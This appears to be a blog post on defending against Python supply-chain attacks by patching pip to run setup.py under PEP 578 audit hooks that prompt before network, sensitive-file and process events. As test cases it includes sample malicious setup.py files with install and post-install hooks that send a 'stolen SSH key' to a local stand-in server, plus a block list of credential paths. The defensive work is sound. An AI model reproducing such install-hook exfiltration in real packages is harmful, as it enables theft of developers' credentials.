Several supply chain attacks, notably in the Python and JavaScript ecosystems, exploit install time hooks to perform malicious activity [1, 2]. Install time hooks allow running arbitrary code before or after a package is installed. Attacks that use install time hooks do not require developers to actually use (import) the package, which makes them an attractive method for attackers. The most common behaviour observed in known supply chain attacks is data exfiltration [1, 2]. Common targets include SSH keys, passwords, dotfiles and environment variables.

A bit about how pip works

Python packages are distributed in two primary formats: wheels (.whl) and source distributions (.tar.gz). Many packages publish both, and when both are available pip prefers the .whl artifact over the .tar.gz unless you pass --no-binary to pip install.
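As a toy model of that preference (not pip’s real selection logic, which also weighs versions and platform tags), a hypothetical pick_artifact helper choosing between the files of a single release might look like this:

```python
from typing import Iterable, Optional


def pick_artifact(filenames: Iterable[str], no_binary: bool = False) -> Optional[str]:
    """Toy model of pip's format preference for a single release.

    Prefers a wheel unless no_binary is set; otherwise falls back to the sdist,
    whose setup.py will then be executed at install time.
    """
    names = list(filenames)
    wheels = [name for name in names if name.endswith(".whl")]
    sdists = [name for name in names if name.endswith(".tar.gz")]
    if wheels and not no_binary:
        return wheels[0]
    return sdists[0] if sdists else None


files = ["example_pkg-1.0.tar.gz", "example_pkg-1.0-py3-none-any.whl"]
print(pick_artifact(files))                  # the wheel
print(pick_artifact(files, no_binary=True))  # the sdist
```

The point for this post: as soon as the sdist is chosen, whether by --no-binary or because no wheel exists, the package’s own code gets to run during installation.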

A package contains metadata such as its name, version, author and dependencies. There are two primary ways to declare package metadata: pyproject.toml and setup.py. pip prefers pyproject.toml over setup.py, as pyproject.toml is considered setup.py’s successor. Poetry, for example, produces both a setup.py and a pyproject.toml when running poetry build; in this case, pip would prioritize pyproject.toml.

If you distribute your package as a wheel, you cannot run install hooks [3]. However, if you distribute it as a source tarball, you can, provided the package ships a setup.py rather than a pyproject.toml. Confusing, right? Don’t worry, just follow along!
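Before installing a tarball you can check which of the two files it ships without extracting or running anything. This is a minimal sketch: sdist_build_files is a hypothetical helper, and it assumes the conventional layout of a single top-level directory (e.g. example_pkg-1.0/setup.py):

```python
import tarfile
from pathlib import PurePosixPath

BUILD_FILES = {"setup.py", "pyproject.toml"}


def sdist_build_files(tar_path: str) -> set:
    """List which build files sit in the top-level directory of an sdist tarball.

    Only member names are read; nothing is extracted or executed.
    """
    found = set()
    with tarfile.open(tar_path, "r:*") as tar:  # "r:*" auto-detects compression
        for member in tar.getmembers():
            parts = PurePosixPath(member.name).parts
            # sdists unpack into one top-level directory, e.g. example_pkg-1.0/setup.py
            if len(parts) == 2 and parts[1] in BUILD_FILES:
                found.add(parts[1])
    return found
```

A result of {"setup.py"} means the package takes the setup.py path described above.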

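Since setup.py is executed during building and installation, it permits execution of arbitrary Python code. There may be legitimate reasons to perform network and/or file system actions during or after installation, but since this is the most common attack vector, let’s explore how we can reduce the attack surface using audit hooks (PEP 578)! An audit hook is a callback registered with sys.addaudithook; the interpreter calls it with an event name and a tuple of arguments whenever a sensitive operation, such as opening a file or a socket, is about to happen.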
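A minimal, non-interactive sketch of the mechanism: a recorder hook that only logs a hypothetical selection of events (WATCHED_EVENTS) and lets everything proceed:

```python
import socket
import sys

# Hypothetical selection of events to record; PEP 578 and the Python docs list the rest.
WATCHED_EVENTS = {"socket.getaddrinfo", "socket.connect", "subprocess.Popen"}
seen = []


def recorder(event, args):
    # Called for *every* audit event in the process, so keep it cheap.
    if event in WATCHED_EVENTS:
        seen.append((event, args))


sys.addaudithook(recorder)  # hooks cannot be removed once added

try:
    socket.getaddrinfo("localhost", 8000)
except OSError:
    pass  # the event is raised before the lookup itself, so it is recorded either way

for event, args in seen:
    print(event, args[:2])
```

For socket.getaddrinfo, args[0] and args[1] are the host and port as passed by the caller, which is what the hook below prints.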

Test Drive

Let’s set up an audit hook that intercepts the socket.getaddrinfo and socket.connect events and asks for confirmation before each one:

# vim hook.py
import sys


def hook(event, args):
    if event == "socket.getaddrinfo":
        print("REQUESTING " + event + " " + str(args[0]) + ":" + str(args[1]))
    elif event == "socket.connect":
        print("REQUESTING " + event + " " + str(args[1][0]) + ":" + str(args[1][1]))
    else:
        return
    data = input("y(es) or n(o): ")
    if data != "y":
        sys.exit(1)

sys.addaudithook(hook)

Let’s test it.

# run http server
$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

# vim test.py
import hook
import requests

r = requests.get("http://0.0.0.0:8000")

Let’s run test.py

$ pip install requests
$ python3 test.py
REQUESTING socket.getaddrinfo 0.0.0.0:8000
y(es) or n(o): y
REQUESTING socket.connect 0.0.0.0:8000
y(es) or n(o): y

Your http server should show:

127.0.0.1 - - [15/Jun/2023 14:33:56] "GET / HTTP/1.1" 200 -

Try answering n instead and notice that the server logs no request.

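Great! Now let’s introduce this hook into pip. We need to insert the audit hook right before pip executes the package’s setup.py. We also need to modify the hook slightly: pip runs setup.py in a subprocess whose stdout and stdin are pipes, so the hook writes the request to stdout, flushes it so pip sees it immediately, and then reads the answer from stdin with a bare input().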

# pip/_internal/utils/setuptools_build.py
import sys
import textwrap
from typing import List, Optional, Sequence


AUDIT_HOOK = textwrap.dedent("""'''
def hook(event, args):
    if event == "socket.getaddrinfo":
        sys.stdout.write("REQUESTING " + event + " " + str(args[0]) + ":" + str(args[1]) + os.linesep)
        sys.stdout.flush()
    elif event == "socket.connect":
        sys.stdout.write("REQUESTING " + event + " " + str(args[1][0]) + ":" + str(args[1][1]) + os.linesep)
        sys.stdout.flush()
        # TODO: filter anything in venv
    # more events that could be intercepted are listed at
    # https://peps.python.org/pep-0578/#suggested-audit-hook-locations
    else:
        return
    # block until pip relays the answer on stdin
    data = input()
    if data != "y":
        sys.exit(1)

sys.addaudithook(hook)
'''""")
# Shim to wrap setup.py invocation with setuptools
# Note that __file__ is handled via two {!r} *and* %r, to ensure that paths on
# Windows are correctly handled (it should be "C:\\Users" not "C:\Users").
_SETUPTOOLS_SHIM = textwrap.dedent(
    """
    exec(compile('''
    # This is <pip-setuptools-caller> -- a caller that pip uses to run setup.py
    #
    # - It imports setuptools before invoking setup.py, to enable projects that directly
    #   import from `distutils.core` to work with newer packaging standards.
    # - It provides a clear error message when setuptools is not installed.
    # - It sets `sys.argv[0]` to the underlying `setup.py`, when invoking `setup.py` so
    #   setuptools doesn't think the script is `-c`. This avoids the following warning:
    #     manifest_maker: standard file '-c' not found".
    # - It generates a shim setup.py, for handling setup.cfg-only projects.
    import os, sys, tokenize
    try:
        import setuptools
    except ImportError as error:
        print(
            "ERROR: Can not execute `setup.py` since setuptools is not available in "
            "the build environment.",
            file=sys.stderr,
        )
        sys.exit(1)

    __file__ = %r
    sys.argv[0] = __file__

    if os.path.exists(__file__):
        filename = __file__
        with tokenize.open(__file__) as f:
            setup_py_code = f.read()
    else:
        filename = "<auto-generated setuptools caller>"
        setup_py_code = "from setuptools import setup; setup()"
    # setup audit hooks here
    %s
    exec(compile(setup_py_code, filename, "exec"))
    ''' % ({!r}, {}), "<pip-setuptools-caller>", "exec"))
    """
).rstrip()


def make_setuptools_shim_args(
    setup_py_path: str,
    global_options: Optional[Sequence[str]] = None,
    no_user_config: bool = False,
    unbuffered_output: bool = False,
) -> List[str]:
    """
    Get setuptools command arguments with shim wrapped setup file invocation.

    :param setup_py_path: The path to setup.py to be wrapped.
    :param global_options: Additional global options.
    :param no_user_config: If True, disables personal user configuration.
    :param unbuffered_output: If True, adds the unbuffered switch to the
     argument list.
    """
    args = [sys.executable]
    if unbuffered_output:
        args += ["-u"]
    args += ["-c", _SETUPTOOLS_SHIM.format(setup_py_path, AUDIT_HOOK)]
    if global_options:
        args += global_options
    if no_user_config:
        args += ["--no-user-cfg"]
    return args


def make_setuptools_bdist_wheel_args(
    setup_py_path: str,
    global_options: Sequence[str],
    build_options: Sequence[str],
    destination_dir: str,
) -> List[str]:
    # NOTE: Eventually, we'd want to also -S to the flags here, when we're
    # isolating. Currently, it breaks Python in virtualenvs, because it
    # relies on site.py to find parts of the standard library outside the
    # virtualenv.
    args = make_setuptools_shim_args(
        setup_py_path, global_options=global_options, unbuffered_output=True
    )
    args += ["bdist_wheel", "-d", destination_dir]
    args += build_options
    return args


def make_setuptools_clean_args(
    setup_py_path: str,
    global_options: Sequence[str],
) -> List[str]:
    args = make_setuptools_shim_args(
        setup_py_path, global_options=global_options, unbuffered_output=True
    )
    args += ["clean", "--all"]
    return args


def make_setuptools_develop_args(
    setup_py_path: str,
    *,
    global_options: Sequence[str],
    no_user_config: bool,
    prefix: Optional[str],
    home: Optional[str],
    use_user_site: bool,
) -> List[str]:
    assert not (use_user_site and prefix)

    args = make_setuptools_shim_args(
        setup_py_path,
        global_options=global_options,
        no_user_config=no_user_config,
    )

    args += ["develop", "--no-deps"]

    if prefix:
        args += ["--prefix", prefix]
    if home is not None:
        args += ["--install-dir", home]

    if use_user_site:
        args += ["--user", "--prefix="]

    return args


def make_setuptools_egg_info_args(
    setup_py_path: str,
    egg_info_dir: Optional[str],
    no_user_config: bool,
) -> List[str]:
    args = make_setuptools_shim_args(setup_py_path, no_user_config=no_user_config)

    args += ["egg_info"]

    if egg_info_dir:
        args += ["--egg-base", egg_info_dir]

    return args
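The shim relies on two rounds of substitution: in pip, str.format fills {!r} and {}; in the child process, the % operator fills %r and %s before exec runs the result. That is why AUDIT_HOOK is wrapped in ''' quotes: it has to be a valid string literal inside the generated % (...) tuple. The sketch below reproduces the trick with a hypothetical, trimmed-down template and a no-op hook; SHIM_TEMPLATE, HOOK_LITERAL and run_shim are illustrative names, not pip’s:

```python
import subprocess
import sys
import textwrap

# Hypothetical, trimmed-down stand-in for pip's _SETUPTOOLS_SHIM. The real shim also
# imports setuptools and executes setup.py; this one only prints the path.
SHIM_TEMPLATE = textwrap.dedent(
    """
    exec(compile('''
    import os, sys
    __file__ = %r
    %s
    print("would run", __file__)
    ''' % ({!r}, {}), "<shim>", "exec"))
    """
).rstrip()

# The hook source must itself be a string literal, because it is spliced into the
# `% (...)` tuple of the generated program and only then into the %s slot.
HOOK_LITERAL = "'''\nsys.addaudithook(lambda event, args: None)\n'''"


def run_shim(setup_py_path: str) -> str:
    # Round 1 (parent): str.format fills {!r} and {} with source text.
    shim = SHIM_TEMPLATE.format(setup_py_path, HOOK_LITERAL)
    # Round 2 (child): the % operator fills %r and %s, then exec runs the result.
    result = subprocess.run(
        [sys.executable, "-c", shim], capture_output=True, text=True, check=True
    )
    return result.stdout
```

Calling run_shim("/tmp/pkg/setup.py") should echo the path back, confirming that the generated program still compiles with the hook spliced in.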

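Since pip runs setup.py in a subprocess, the audit hook cannot prompt the user directly. pip has to read each REQUESTING line from the subprocess’s output, ask the user itself, and relay the answer (y or n) to the subprocess’s stdin.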
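Stripped of pip’s logging and spinner machinery, the relay can be sketched in isolation. In this minimal sketch the child is a hypothetical stand-in for setup.py (CHILD_SOURCE), and relay() answers every request with a fixed string instead of asking the user; both names are illustrative, not part of pip:

```python
import subprocess
import sys
import textwrap

# Hypothetical stand-in for setup.py running under the audit hook: it announces the
# request on stdout, flushes so the parent sees it at once, then blocks on stdin.
CHILD_SOURCE = textwrap.dedent(
    """
    import sys
    sys.stdout.write("REQUESTING socket.connect 0.0.0.0:8000\\n")
    sys.stdout.flush()
    if input() != "y":
        sys.exit(1)
    print("connected")
    """
)


def relay(answer: str) -> int:
    """Run the child, answer each REQUESTING line with `answer`, return its exit code."""
    proc = subprocess.Popen(
        [sys.executable, "-c", CHILD_SOURCE],
        stdin=subprocess.PIPE,
        stdout=subprocess.PIPE,
        text=True,
    )
    assert proc.stdin is not None and proc.stdout is not None
    for line in proc.stdout:
        if "REQUESTING" in line:
            # In pip, this answer comes from input() in the parent process.
            proc.stdin.write(answer + "\n")
            proc.stdin.flush()
        else:
            print("child:", line.rstrip())
    proc.stdin.close()
    return proc.wait()
```

relay("y") lets the child continue and exit with 0, while relay("n") makes it exit with 1. The flush on both sides matters: without it, each process could sit waiting for data stuck in the other’s buffer.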

# pip/_internal/utils/subprocess.py
import logging
import os
import shlex
import subprocess
from typing import (
    TYPE_CHECKING,
    Any,
    Callable,
    Iterable,
    List,
    Mapping,
    Optional,
    Union,
)

from pip._vendor.rich.markup import escape

from pip._internal.cli.spinners import SpinnerInterface, open_spinner
from pip._internal.exceptions import InstallationSubprocessError
from pip._internal.utils.logging import VERBOSE, subprocess_logger
from pip._internal.utils.misc import HiddenText

if TYPE_CHECKING:
    # Literal was introduced in Python 3.8.
    #
    # TODO: Remove `if TYPE_CHECKING` when dropping support for Python 3.7.
    from typing import Literal

CommandArgs = List[Union[str, HiddenText]]


def make_command(*args: Union[str, HiddenText, CommandArgs]) -> CommandArgs:
    """
    Create a CommandArgs object.
    """
    command_args: CommandArgs = []
    for arg in args:
        # Check for list instead of CommandArgs since CommandArgs is
        # only known during type-checking.
        if isinstance(arg, list):
            command_args.extend(arg)
        else:
            # Otherwise, arg is str or HiddenText.
            command_args.append(arg)

    return command_args


def format_command_args(args: Union[List[str], CommandArgs]) -> str:
    """
    Format command arguments for display.
    """
    # For HiddenText arguments, display the redacted form by calling str().
    # Also, we don't apply str() to arguments that aren't HiddenText since
    # this can trigger a UnicodeDecodeError in Python 2 if the argument
    # has type unicode and includes a non-ascii character.  (The type
    # checker doesn't ensure the annotations are correct in all cases.)
    return " ".join(
        shlex.quote(str(arg)) if isinstance(arg, HiddenText) else shlex.quote(arg)
        for arg in args
    )


def reveal_command_args(args: Union[List[str], CommandArgs]) -> List[str]:
    """
    Return the arguments in their raw, unredacted form.
    """
    return [arg.secret if isinstance(arg, HiddenText) else arg for arg in args]


def call_subprocess(
    cmd: Union[List[str], CommandArgs],
    show_stdout: bool = False,
    cwd: Optional[str] = None,
    on_returncode: 'Literal["raise", "warn", "ignore"]' = "raise",
    extra_ok_returncodes: Optional[Iterable[int]] = None,
    extra_environ: Optional[Mapping[str, Any]] = None,
    unset_environ: Optional[Iterable[str]] = None,
    spinner: Optional[SpinnerInterface] = None,
    log_failed_cmd: Optional[bool] = True,
    stdout_only: Optional[bool] = False,
    *,
    command_desc: str,
) -> str:
    """
    Args:
      show_stdout: if true, use INFO to log the subprocess's stderr and
        stdout streams.  Otherwise, use DEBUG.  Defaults to False.
      extra_ok_returncodes: an iterable of integer return codes that are
        acceptable, in addition to 0. Defaults to None, which means [].
      unset_environ: an iterable of environment variable names to unset
        prior to calling subprocess.Popen().
      log_failed_cmd: if false, failed commands are not logged, only raised.
      stdout_only: if true, return only stdout, else return both. When true,
        logging of both stdout and stderr occurs when the subprocess has
        terminated, else logging occurs as subprocess output is produced.
    """
    if extra_ok_returncodes is None:
        extra_ok_returncodes = []
    if unset_environ is None:
        unset_environ = []
    # Most places in pip use show_stdout=False. What this means is--
    #
    # - We connect the child's output (combined stderr and stdout) to a
    #   single pipe, which we read.
    # - We log this output to stderr at DEBUG level as it is received.
    # - If DEBUG logging isn't enabled (e.g. if --verbose logging wasn't
    #   requested), then we show a spinner so the user can still see the
    #   subprocess is in progress.
    # - If the subprocess exits with an error, we log the output to stderr
    #   at ERROR level if it hasn't already been displayed to the console
    #   (e.g. if --verbose logging wasn't enabled).  This way we don't log
    #   the output to the console twice.
    #
    # If show_stdout=True, then the above is still done, but with DEBUG
    # replaced by INFO.
    if show_stdout:
        # Then log the subprocess output at INFO level.
        log_subprocess: Callable[..., None] = subprocess_logger.info
        used_level = logging.INFO
    else:
        # Then log the subprocess output using VERBOSE.  This also ensures
        # it will be logged to the log file (aka user_log), if enabled.
        log_subprocess = subprocess_logger.verbose
        used_level = VERBOSE

    # Whether the subprocess will be visible in the console.
    showing_subprocess = subprocess_logger.getEffectiveLevel() <= used_level

    # Only use the spinner if we're not showing the subprocess output
    # and we have a spinner.
    use_spinner = not showing_subprocess and spinner is not None

    log_subprocess("Running command %s", command_desc)
    env = os.environ.copy()
    if extra_environ:
        env.update(extra_environ)
    for name in unset_environ:
        env.pop(name, None)
    try:
        proc = subprocess.Popen(
            # Convert HiddenText objects to the underlying str.
            reveal_command_args(cmd),
            stdin=subprocess.PIPE,
            stdout=subprocess.PIPE,
            stderr=subprocess.STDOUT if not stdout_only else subprocess.PIPE,
            cwd=cwd,
            env=env,
            errors="backslashreplace",
        )
    except Exception as exc:
        if log_failed_cmd:
            subprocess_logger.critical(
                "Error %s while executing command %s",
                exc,
                command_desc,
            )
        raise
    all_output = []
    if not stdout_only:
        assert proc.stdout
        assert proc.stdin
        # In this mode, stdout and stderr are in the same pipe.
        # stdin stays open so that answers can be relayed to the audit hook.
        while True:
            line: str = proc.stdout.readline()
            if not line:
                break
            line = line.rstrip()
            all_output.append(line + "\n")
            if "REQUESTING" in line:
                # The audit hook in the child is blocked on input(): ask the
                # user here and forward the answer to the child's stdin.
                data = input(f"Package is {line}. (y)es or (n)o\n")
                proc.stdin.write(data + "\n")
                proc.stdin.flush()
            else:
                # Show the line immediately.
                log_subprocess(line)

        try:
            proc.wait()
        finally:
            if proc.stdout:
                proc.stdout.close()
            proc.stdin.close()
        output = "".join(all_output)
    else:
        # In this mode, stdout and stderr are in different pipes.
        # We must use communicate() which is the only safe way to read both.
        # communicate() closes stdin, so an audit hook prompt in this mode
        # reads EOF and the audited operation is aborted with EOFError.
        out, err = proc.communicate()
        # log line by line to preserve pip log indenting
        for out_line in out.splitlines():
            log_subprocess(out_line)
        all_output.append(out)
        for err_line in err.splitlines():
            log_subprocess(err_line)
        all_output.append(err)
        output = out

    proc_had_error = proc.returncode and proc.returncode not in extra_ok_returncodes
    if use_spinner:
        assert spinner
        if proc_had_error:
            spinner.finish("error")
        else:
            spinner.finish("done")
    if proc_had_error:
        if on_returncode == "raise":
            error = InstallationSubprocessError(
                command_description=command_desc,
                exit_code=proc.returncode,
                output_lines=all_output if not showing_subprocess else None,
            )
            if log_failed_cmd:
                subprocess_logger.error("[present-rich] %s", error)
                subprocess_logger.verbose(
                    "[bold magenta]full command[/]: [blue]%s[/]",
                    escape(format_command_args(cmd)),
                    extra={"markup": True},
                )
                subprocess_logger.verbose(
                    "[bold magenta]cwd[/]: %s",
                    escape(cwd or "[inherit]"),
                    extra={"markup": True},
                )

            raise error
        elif on_returncode == "warn":
            subprocess_logger.warning(
                'Command "%s" had error code %s in %s',
                command_desc,
                proc.returncode,
                cwd,
            )
        elif on_returncode == "ignore":
            pass
        else:
            raise ValueError(f"Invalid value: on_returncode={on_returncode!r}")
    return output


def runner_with_spinner_message(message: str) -> Callable[..., None]:
    """Provide a subprocess_runner that shows a spinner message.

    Intended for use with for BuildBackendHookCaller. Thus, the runner has
    an API that matches what's expected by BuildBackendHookCaller.subprocess_runner.
    """

    def runner(
        cmd: List[str],
        cwd: Optional[str] = None,
        extra_environ: Optional[Mapping[str, Any]] = None,
    ) -> None:
        with open_spinner(message) as spinner:
            call_subprocess(
                cmd,
                command_desc=message,
                cwd=cwd,
                extra_environ=extra_environ,
                spinner=spinner,
            )

    return runner

And that’s it! pip should now prompt you every time a socket connection is attempted during installation.

Testing our hook:

Let’s create a fake package to test it out:

$ mkdir test
$ vim test/setup.py
# test/setup.py
from setuptools import setup
import requests # you can use socket too
requests.get('http://0.0.0.0:8000/?key=your_stolen_ssh_key')
setup()
$ tar -czf test.tar.gz test
$ pip install test.tar.gz
Processing ./test.tar.gz
  Preparing metadata (setup.py) ...
Package is REQUESTING socket.getaddrinfo 0.0.0.0:8000. (y)es or (n)o

Another method, running the payload after installation by overriding the install and develop commands:

$ vim test/setup.py
# test/setup.py
from setuptools import setup
from setuptools.command.install import install
from setuptools.command.develop import develop
import requests # you can use socket too


class AfterInstall(install):
    def run(self):
        install.run(self)
        requests.get('http://0.0.0.0:8000/?key=your_stolen_ssh_key')


class AfterDevelop(develop):
    def run(self):
        develop.run(self)
        requests.get('http://0.0.0.0:8000/?key=your_stolen_ssh_key')


setup(cmdclass={
    'install': AfterInstall,
    'develop': AfterDevelop,
})
$ tar -czf test.tar.gz test
$ pip install test.tar.gz
Processing ./test.tar.gz
  Preparing metadata (setup.py) ...
done
Building wheels for collected packages: UNKNOWN
  Building wheel for UNKNOWN (setup.py)
 ... Package is REQUESTING socket.getaddrinfo 0.0.0.0:8000. (y)es or (n)o

Yes! It works!
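Answering every prompt by hand can get tedious, for example in CI. A minimal non-interactive variant, assuming a hypothetical ALLOWED_HOSTS allow-list, raises an exception from the hook instead of calling sys.exit. As PEP 578 describes, an exception raised by a hook aborts the audited operation and propagates to the caller:

```python
import socket
import sys

# Hypothetical allow-list of hosts a build may resolve; everything else is refused.
ALLOWED_HOSTS = {"pypi.org", "files.pythonhosted.org"}


def deny_unlisted_hosts(event, args):
    if event != "socket.getaddrinfo":
        return
    host = args[0]
    if isinstance(host, bytes):
        host = host.decode("ascii", "replace")
    if host not in ALLOWED_HOSTS:
        # An exception raised inside a hook aborts the audited operation.
        raise PermissionError(f"blocked DNS lookup for {host!r}")


sys.addaudithook(deny_unlisted_hosts)

blocked_message = None
try:
    socket.getaddrinfo("0.0.0.0", 8000)
except PermissionError as exc:
    blocked_message = str(exc)
print(blocked_message)
```

The trade-off is that the policy has to be decided up front, whereas the interactive hook lets you judge each request as it happens.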

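Additional checks:

The same hook can watch other audit events, such as opening sensitive files, running shell commands, spawning processes and executing code compiled from strings: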

import os
import sys


def hook(event, args):
    if event == "socket.getaddrinfo":
        sys.stdout.write("REQUESTING " + event + " " + str(args[0]) + ":" + str(args[1]) + os.linesep)
        sys.stdout.flush()
    elif event == "socket.connect":
        sys.stdout.write("REQUESTING " + event + " " + str(args[1][0]) + ":" + str(args[1][1]) + os.linesep)
        sys.stdout.flush()
    elif event == "open":
        arg = str(args[0])
        if ".ssh" in arg or "shadow" in arg or "passwd" in arg or ".config" in arg or ".env" in arg:
            sys.stdout.write("REQUESTING " + event + " " + arg + os.linesep)
            sys.stdout.flush()
        else:
            return
    elif event == "os.system":
        # args[0] is bytes on POSIX and str on Windows; os.fsdecode handles both
        sys.stdout.write("REQUESTING " + event + " " + os.fsdecode(args[0]) + os.linesep)
        sys.stdout.flush()
    elif event == "subprocess.Popen":
        # subprocess.call/run/check_output all go through Popen, which raises
        # this event with (executable, args, cwd, env)
        sys.stdout.write("REQUESTING " + event + " " + str(args[1]) + os.linesep)
        sys.stdout.flush()
    elif event == "exec" and getattr(args[0], "co_filename", None) == "<string>":
        # exec() and eval() raise "exec", but so do ordinary imports and pip's own
        # exec of setup.py; only flag code compiled from a plain string
        sys.stdout.write("REQUESTING execution of arbitrary code" + os.linesep)
        sys.stdout.flush()
    else:
        return
    data = input()
    if data != "y":
        sys.exit(1)

Note: For open events it’s easier to maintain a blacklist than a whitelist, as pip and setuptools legitimately open many files while building and installing.
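The substring checks in the open branch are coarse: "passwd" also matches a harmless passwd_utils.py, and ".env" matches any path containing ".environment". A minimal sketch of a component-based check that could replace that condition, with hypothetical SENSITIVE_DIRS and SENSITIVE_FILES lists:

```python
import os
from pathlib import PurePath

# Hypothetical block-lists; extend to taste.
SENSITIVE_DIRS = {".ssh", ".aws", ".gnupg", ".config"}
SENSITIVE_FILES = {"passwd", "shadow", ".env", ".netrc"}


def is_sensitive(path) -> bool:
    """Return True if an `open` audit event's path argument looks sensitive.

    Matches whole path components rather than substrings, so a file such as
    "passwd_utils.py" or a directory such as "my.environment" is not flagged.
    """
    if isinstance(path, int):
        # open() on an already-open file descriptor: no path to inspect.
        return False
    parts = PurePath(os.fsdecode(path)).parts  # accepts str, bytes and PathLike
    if not parts:
        return False
    return parts[-1] in SENSITIVE_FILES or any(part in SENSITIVE_DIRS for part in parts)
```

Inside the hook, the branch would then read `elif event == "open" and is_sensitive(args[0]):`, with the function defined in the same injected source.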

Conclusion:

Audit hooks are NOT foolproof and can be bypassed by an advanced adversary; see PEP 578 for details. Despite that, this implementation provides a simple and effective defence against the abuse of install time hooks.

See the full implementation at https://github.com/R9295/pip.

Use it:

$ python3 -m venv venv
$ source venv/bin/activate
$ cd venv/lib/python3.<yourversion>/site-packages/
$ mv pip old_pip
$ wget https://github.com/R9295/pip/archive/refs/heads/main.zip
$ unzip main.zip
$ mv pip-main pip
$ cd pip
$ mv src/pip/* .
$ cd /path/to/your/test/package
$ pip install test.tar.gz
# it should work!
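To confirm that the venv really picks up the patched copy, one quick check is to look for the AUDIT_HOOK attribute added to setuptools_build.py. This is a sketch under two assumptions: it relies on pip’s private pip._internal module layout, and patched_pip_active is a hypothetical helper name. Run it with the venv’s python:

```python
import importlib


def patched_pip_active() -> bool:
    """True if the importable pip carries the AUDIT_HOOK added to setuptools_build.py."""
    try:
        module = importlib.import_module("pip._internal.utils.setuptools_build")
    except ImportError:
        # pip is missing, or its internal layout differs from what we assume.
        return False
    return hasattr(module, "AUDIT_HOOK")


print("patched pip active:", patched_pip_active())
```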

1. Ohm et al., “Backstabber’s Knife Collection: A Review of Open Source Software Supply Chain Attacks”

2. Duan et al., “Towards Measuring Supply Chain Attacks on Package Managers for Interpreted Languages”

3. https://stackoverflow.com/questions/24263774/post-install-script-after-installing-a-wheel